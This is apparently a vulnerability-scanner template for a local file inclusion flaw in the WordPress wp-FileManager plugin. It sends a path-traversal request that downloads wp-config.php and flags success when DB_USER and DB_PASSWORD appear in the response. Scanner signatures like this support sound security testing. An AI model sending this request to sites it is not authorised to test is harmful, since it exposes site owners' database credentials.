id: wordpress-wp-filemanager-lfi
info:
  name: Wordpress wp-FileManager LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')

references:
  - link: https://www.exploit-db.com/exploits/38515